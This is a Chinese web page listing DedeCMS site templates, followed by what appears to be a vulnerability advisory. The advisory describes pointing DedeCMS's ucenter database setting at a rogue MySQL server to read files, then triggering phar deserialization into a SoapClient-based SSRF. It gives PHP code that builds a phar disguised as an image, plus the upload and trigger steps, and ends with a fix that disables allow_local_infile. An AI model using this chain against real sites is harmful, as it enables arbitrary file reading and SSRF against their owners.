-
園林景觀設計類網站織夢...
-
汽車配件類網站織夢模板...
-
網站建設營銷類網站織夢...
-
農業機械設備類網站織夢...
-
中藥藥材百科資訊類網站...
-
水性工業漆類企業網站織...
-
灶具電器設備類網站織夢...
-
APP應用程序官網類網站織...
-
企業公司行業通用類網站...
-
水上樂園設備類網站織夢...
-
新媒體自媒體運營資訊類...
-
環保設備研發制造類網站...
-
環保電動掃地車類網站織...
-
園林綠化景觀建設類網站...
-
辦公學習教程資訊類網站...
-
車輛機油工業潤滑油類網...
-
LED顯示屏中英雙外貿類網...
-
攝影拍攝短視頻類網站織...
-
潮流資訊信息類網站織夢...
-
道路護欄交通設施類網站...
dedecms的后臺存在ucenter功能,可以直接修改ucenter的配置,使網站的mysql連接。指向我們預先構造的rogue mysql server https://github.com/Gifts/Rogue-MySql-Server.git
設置之后我們就可以通過修改惡意服務端的設置來讀取任意文件。 假如讀取的文件路徑是以phar協議開頭的,那么讀取的文件內容就會被反序列化。 根據dedecms的代碼,我們可以利用soapclient內置類來構造反序列化pop鏈來ssrf。
<?phpclass Control{var $tpl;public $dsql;function __construct(){$this->dsql = new SoapClient(null,array('uri'=>'http://test:5555', 'location'=>'http://test:5555/aaa'));}}@unlink("dedecms.phar");$phar = new Phar("dedecms.phar");$phar->startBuffering();$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");$o = new Control();$phar->setMetadata($o);$phar->addFromString("test.txt", "test");$phar->stopBuffering();?>
將生成的文件修改為dedecms.png,然后在dedecms上有很多地方都可以上傳。
上傳成功之后可以從文件列表中獲取到圖片鏈接。
phar://../uploads/allimg/190724/1_1529564891.png/test.txt
設置完成之后,刷新就可以觸發ssrf。
解決方案:
臨時解決方案
通過mysqli_options設置鏈接時禁用allow_local_infile配置可阻止該漏洞。
或在php.ini中改配置為mysqli.allow_local_infile = Off




